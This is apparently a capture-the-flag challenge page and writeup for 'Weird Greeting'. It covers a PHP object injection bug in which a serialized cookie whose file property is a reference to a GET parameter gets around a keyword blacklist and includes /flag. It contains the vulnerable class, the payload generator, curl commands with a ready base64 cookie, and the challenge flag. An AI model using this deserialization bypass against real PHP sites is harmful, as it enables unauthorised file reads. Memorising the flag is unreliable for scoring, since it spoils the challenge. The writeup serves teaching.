# Weird Greeting

## Index

[[_TOC_]]

## Points

* Difficulty: Medium
* Maximum Score `400`
* Minimum Score `50`
* Decadence `15`

## Hints

None

## Flag

`bitup21{d54e431cdd48707b5515fd769ce299c8}`

## Attachments

* index.zip (MD5: 9561df359c2a4abc474d82a76e5ab8fb)
    * index.php (MD5: e0270267f64af4e16ea9a43e37fc6232)

## Deploy

Click [here](deploy) to see how to deploy the challenge with Docker. 

## Requirements

**Docker** is required to deploy the challenge.

## Description

Making greetings weird again!

## Writeup

```php
class WeirdGreeting {
    public $param;
    public $file;

    public function __construct() {
        $this->init();
    }

    public function __wakeup() {
        $this->init();
    }

    public function init() {
        $this->file = ""; // for __destruct()
        $this->param = $_GET['name']; // for greet()
    }

    public function greet() {
        return "Hello, $this->param!";
    }

    public function __destruct() {
        if (!empty($this->file)) {
            include($this->file);
        }
    }
}
```

This challenge is a bit harder than `friendly-greeting`, as the webapp has a blacklist.

```php
    foreach(["flag", ".log", "self"] as $str) {
        if (strpos($_COOKIE['greeting'], $str)) {
            die("Super hacker detected!");
        }    
    }
```

However, in serialization we may set a variable as a reference to another:

```php
class WeirdGreeting {
    public $param;
    public $file;
}

$obj = new WeirdGreeting();
$obj->file =& $obj->param;
echo base64_encode(serialize($obj));
```

This way, `$obj->file` will be a reference to `$obj->param` (variable holding `$_GET['name']`, where we won't get any blacklist).

```
$~ curl -X POST 'https://weird-greeting.bitupalicante.com/?name=/flag' -b "greeting=$(php deser.php)"
bitup21{d54e431cdd48707b5515fd769ce299c8}
```

or:

```
$~ curl -X POST 'https://weird-greeting.bitupalicante.com/?name=/flag' -b "greeting=TzoxMzoiV2VpcmRHcmVldGluZyI6Mjp7czo1OiJwYXJhbSI7TjtzOjQ6ImZpbGUiO1I6Mjt9"
bitup21{d54e431cdd48707b5515fd769ce299c8}
```

## Notes

None

## References

* https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection

## Author

@jorgectf
